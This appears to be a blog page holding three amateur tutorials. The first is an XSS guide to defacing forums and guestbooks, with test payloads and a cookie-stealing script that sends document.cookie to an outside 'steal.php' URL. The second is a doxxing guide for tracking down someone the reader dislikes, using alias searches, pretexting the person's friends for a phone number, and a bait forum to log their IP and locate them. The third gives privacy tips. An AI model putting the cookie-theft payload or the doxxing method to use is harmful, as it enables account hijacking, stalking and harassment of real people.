pred0ra

-[Information]—————————————————————–
Title: “Cross Site Scripting Tutorial [XSS]“
Author: NurBo`
———————————————————————————

What is Cross Site Scripting:
XSS Stands for Cross Site Scripting, xss is a vulnerability  that is normal found
in a web app. XSS allows the user to inject malicious codes such as HTML and
Java script. XSS can be used to steal cookies, make phishing pages and
just having some fun with the website.

What is A cookie:
A cookie is a text-only string that gets entered into the memory of your browser.
This value of a variable that a website sets. If the lifetime of this value is set
to be longer than the time you spend at that site, then this string
is saved to file for future reference.

What can XSS do now days?:
Cross Site Scripting is used commonly now days in the cyber
world. XSS can take down most websites that are up to date,
Cross Site Scripting can steal cookies from websites/forums.
Make pop ups, appear were there not suppose to “search bars”
etc. Or you can even do some very malicious codes such as
redirect the website to another one. The question is, is your
website safe?

Hacking forums/guest books with XSS:
Forum Hacking:  Now in order to defaced or even attempt
to hack a forum. The forum must have HTML enabled, so you can
enter some malicious codes. If the forum does have HTML enabled
then you can enter codes such as;

Code:

<html>
<head><title>Enjoy the xss tutorial  </title></head>
<body>
<img src="javascript:alert('Defaced By:')">
</body>
</html>

If the forum allows the imagen tags then you can use this tag to
steal peoples cookies.

Code:

<img src="javascript:window.location='http://www.url.com/steal.php?account='+document.cookie">

Now to get to guest book hacking when your posting on the guest book
it must also be vulnerable. Meaning html must be enabled, to see if html
is enabled put these tags in your post <B>hello world</B> and if your
text comes back bold. Then html is enabled now try doing other techniques
you can also put some java script inside the html and see if that works.
And if it does or if it doesn’t you can still deface the guest book with writing
up some cool html codes that take up the whole guest book page.

Defacing Websites with Cross Site Scripting:
As many of you know Cross Site Scripting is used alot now days to exploit
websites and forums.
Mostly search functions etc. Now some of the common XSS’es now days
are within the search bars for websites. To make a box pop
up saying what every you put in the script. Some XSS codes are;

Quote:
<script>alert("NurBo`")</script> <BODY ONLOAD=alert(document.cookie)> "><script>alert(NurBo`);</script> <script>window.document.write("<input type='file'>");</script> <a href='search?searchterm=<b>Oh you clicked my link</b>'>NurBo`</a>
Now how can I deface a website with just making 1 little pop up on
the search bar page? You can redirect the site to your website or your friends or you can steel cookies. Make a html defacement page and put the whole code
in your script. You can do many things, with java script on a vulnerable
website.

Conclusion:
We’ll I hope you  guy’s liked this introduction tutorial to what XSS
(” Cross Site Scripting “) can do. I will be making more advance tutorials
in the near future. So I hope this tutorial taught a few people what XSS
can do and how fun it is. Keep your sites secure and enjoy!

References:
http://www.xssed.com/
http://www.cookiecentral.com/
http://ha.ckers.org/xss

#Introduction:
So you want to find some information out on some guy talking shit about you
or he just over stayed his welcome? Then this tutorial will show you how to
find some information out about a person. So I hope everybody enjoys this
tutorial.

#Google:
A good first start is the all mighty Google some people think it can’t help you at all
but it will be a big factor in the Data Mine. What you first want to do is grab the guys
alias and Google it. If it comes up with to many results as in other people use that name
as we’ll then now you want to try some different information. Try to get his email address
aim,yahoo,msn what ever. Then google that ex. pdphoenix3@hotmail.com just Google that
and this will show up websites/forums that person has signed up in with that email address.
So let’s say he has a yahoo account or a Stickam account, then you want to look for pictures
of him. Or some more information about him zip codes,other addition information or look through
his forum post. And see if he says anything about his Real life, were he lives or other things like
that.

#Myspace:
Now most people will say myspace wtf?? We’ll if you have that persons email address
then try it out on the Myspace search. Goto Search>Then click the Email button>Then put there
email address in there. And if they have a myspace then bam if there picture from other sites look just
like his Myspace picture then you know. Thats him! So then check out his friends most of his top 8
and see were all of there locations are. Let’s say all of there location information says Texas Fuck you city
or something like that. And half of the people on his top 8 has that, then you know he’s from there
(the girls myspaces are the best to scope out for school information and location information)
Another cool way I thought of is let’s say he has his real name on his Myspace you can try sending
one of the girls on his top 8 a message saying “Yo home dog yo b do you got Jasons number b
I was suppose to meet him at the mall b you feel me b if you have his cell phone or house phone
can you please send it to me b thanks b” And most of the time they will send you there phone number
so now you have there Picture,Phone Number, and General Location.

#Messengers:
Another way to find out some information is if you have one of there messenger info like there aim account
or something. Then you can google there Aim name pdphoenix3 and half the time it will come up with
something another forum another website then start looking for more information on the guy.

#Ip:
A good way to make sure you know there location is to get there ip address how can you
get this if you only talk to them on aim or myspace??? We’ll you make a quick free forum and
you make the domain something that there interested in say cars. So name the forum
cars.freeforum.com then you login to the forum as admin and then watch out for users
ip address. So then you message your friend over aim saying “hey man I just made this
new car forum wanna admin or mod on it at least tell me what you think about it.
cars.freeforum.com check it real quick” Ok most of the time he will goto it then refresh the
logs and bam you have his ip address. This is a trick I usually do =P so now that you have
his ip address its time to whois it. Here is a good website

Code:

Code:

http://www.ip-adress.com/

This will tell you his state,city,country etc then now you know his location for sure now
you have the myspace proof and now this.

#Conclusion:
So now you have a picture of him his phone number his email address
and other messenger information, and now you his location. We’ll if you want to
go deeper check out some of these websites search his real name etc

Sites:
http://infospace.intelius.com/
http://www.searchbug.com/
http://www.ip-adress.com/
http://www.nuecescad.net/Appraisal/PublicAccess/
http://www.telcodata.us/
http://www.reversephonedetective.com/

Made By:NurBo

http://pred0ra.wordpress.com

#Part One-Exploring Yourself:
Sounds a little queer but one of the first things you
can do is do some research on your self. So if there is
any type of information about you on the internet. You will
find it and destroy it search your real name, alias etc.

#Tips:
1)Make sure you never I mean never! put your whole name
on the net. Anthony Meheme Jackson see that was a mistake
putting my name on the net now if somebody hates me they already have some basic Intel on me.

2)Phone Number:
Never give your phone number out to anybody I don’t care
if you think your close. I remember this one story that made me
rofl! This kid I won’t say his name he gave his phone number
to his friend because they where in the same security group.
Then his friend pissed off somebody from the g00ns, so they
started saying they would get his mom fired blah blah blah you know saying shit that would make a skid shit his pants. So then he fessed up and gave one of the g00ns members his phone number just like that
now you’ll have people calling your house like its a Chinese sweat shop.

3)Emails:
When ever you sign up on a forum/website try to use the function
that will hide your email address so when people search it on Google
they won’t find anything. So its always good to do that.

4)Locations:
We’ll for me I really don’t care if people know I live in California
just make sure they don’t know your city :p. Because
if I knew some kids location I would only be searching that
city’s locations/names/phone numbers. Now if your on some kids
website that you know he hates you make sure you surf there
website via pr0xy/vpn so you have several different ip address
on there website.

5)Myspace:
If you do own a Myspace account as do I call me a “Myspace fag” what ever I only use my Myspace to talk to my old friends. Any ways make sure your profile is private so people have to add you to see your profile. Or if you want to make it public hide your friends. Because if your Myspace profile is “public” then the person that is looking for your Intel can look at all of your friends and see where they live what school they goto etc. So watch out for that to this includes BeBo etc. And make sure you don’t have your whole name on your Myspace first name is cool and watch your comments as we’ll because one of your friends might post your whole name as a comment.

6)Registering a Domain:
Make sure that you uses private registration feature, it’s gonna cost you a few more bucks but it’s really worth it cuz anyone can easily whois your domain and know all your private information “full name, phone numbers, fax, address …. etc”

7)Paying for Stuff Online:
Make sure that you use disposable credit cards and the same via PayPal because they can be easily tracked, just buy whateva you want and throw them away and for every purchase use a different credit card or PayPal account

#Fake Information:
This is a very good thing too do especially if your on alot
of websites/forums when ever I make a new email or something I use
my real first name (or do I) but a fake Last Name or fake Middle name so when the person does try to get some intel on you theres so much fake shez around him he won’t know which one to pick.

#Conclusion:
Just make sure you watch out what you put on the net
you may think its nothing but with your whole name some
hackers can do alot with it and always remember small clues
can easily add up to answers when put together like a
jigsaw. One of the quotes I like is
“Don’t put anything on the net that you wouldn’t share in public” I think thats the quote.